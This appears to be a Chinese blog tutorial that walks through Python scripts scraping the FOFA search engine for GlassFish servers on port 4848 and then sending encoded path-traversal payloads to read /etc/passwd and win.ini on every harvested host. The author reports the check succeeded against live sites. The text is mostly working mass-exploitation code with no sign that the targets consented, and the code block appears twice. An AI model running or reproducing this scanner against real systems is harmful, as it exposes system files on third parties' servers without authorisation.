python开发-批量fofa&POC验证

之前在网上看到glassfish爆过一个任意文件读取的漏洞，想着通过python脚本和fofa搜索引擎来批量验证一些网站是否存在这个漏洞

首先通过爬虫爬取fofa引擎安装了glassfish服务的网站

import requests
import base64
from lxml import etree
import time


search_data='"glassfish" && port="4848"'
headers={
    'cookie':'自己的cookie信息',
}
for yeshu in range(1,6):
    url='https://fofa.so/result?page='+str(yeshu)+'&qbase64='
    search_data_bs=str(base64.b64encode(search_data.encode("utf-8")),"utf-8")
    urls=url+search_data_bs
    #print(urls)
    try:
        print('怎在提取第'+str(yeshu)+'页')
        result=requests.get(urls,headers=headers).content
        soup=etree.HTML(result)
        ip_data=soup.xpath('//span[@]/a[@target="_blank"]/@href')
        ipdata='n'.join(ip_data)
        print(ip_data)
        with open(r'ip.txt','a+') as f:
            f.write(ipdata+'n')
            f.close()
        time.sleep(0.5)
    except Exception as e:
        pass

运行结果

因为fofa引擎没有会员的话是只能爬取50个数据的，也就是5页，所以这里我只爬取了50个网站

payload_linux='/theme/meta-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
payload_windows='/theme/meta-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
for ip in open('ip.txt'):
    ip=ip.replace('n','')
    windows_url=ip+payload_windows
    linux_url=ip+payload_linux
    try:
        vuln_code_linux=requests.get(linux_url).status_code
        vuln_code_windows=requests.get(windows_url).status_code
        print("check->"+ip)
        if vuln_code_linux==200 or vuln_code_windows==200:
            with open(r'vuln.txt','a+') as f:
                f.write(ip)
                f.write('n')
                f.close()
        time.sleep(0.5)
    except Exception as e:
        pass

import requests
import base64
from lxml import etree
import time


search_data='"glassfish" && port="4848"'
headers={
    'cookie':'自己的cookie信息',
}
for yeshu in range(1,6):
    url='https://fofa.so/result?page='+str(yeshu)+'&qbase64='
    search_data_bs=str(base64.b64encode(search_data.encode("utf-8")),"utf-8")
    urls=url+search_data_bs
    #print(urls)
    try:
        print('怎在提取第'+str(yeshu)+'页')
        result=requests.get(urls,headers=headers).content
        soup=etree.HTML(result)
        ip_data=soup.xpath('//span[@]/a[@target="_blank"]/@href')
        ipdata='n'.join(ip_data)
        print(ip_data)
        with open(r'ip.txt','a+') as f:
            f.write(ipdata+'n')
            f.close()
        time.sleep(0.5)
    except Exception as e:
        pass


payload_linux='/theme/meta-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
payload_windows='/theme/meta-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
for ip in open('ip.txt'):
    ip=ip.replace('n','')
    windows_url=ip+payload_windows
    linux_url=ip+payload_linux
    try:
        vuln_code_linux=requests.get(linux_url).status_code
        vuln_code_windows=requests.get(windows_url).status_code
        print("check->"+ip)
        if vuln_code_linux==200 or vuln_code_windows==200:
            with open(r'vuln.txt','a+') as f:
                f.write(ip)
                f.write('n')
                f.close()
        time.sleep(0.5)
    except Exception as e:
        pass

运行结果

存在漏洞的网站

这里我只找两个网站进行验证


漏洞验证成功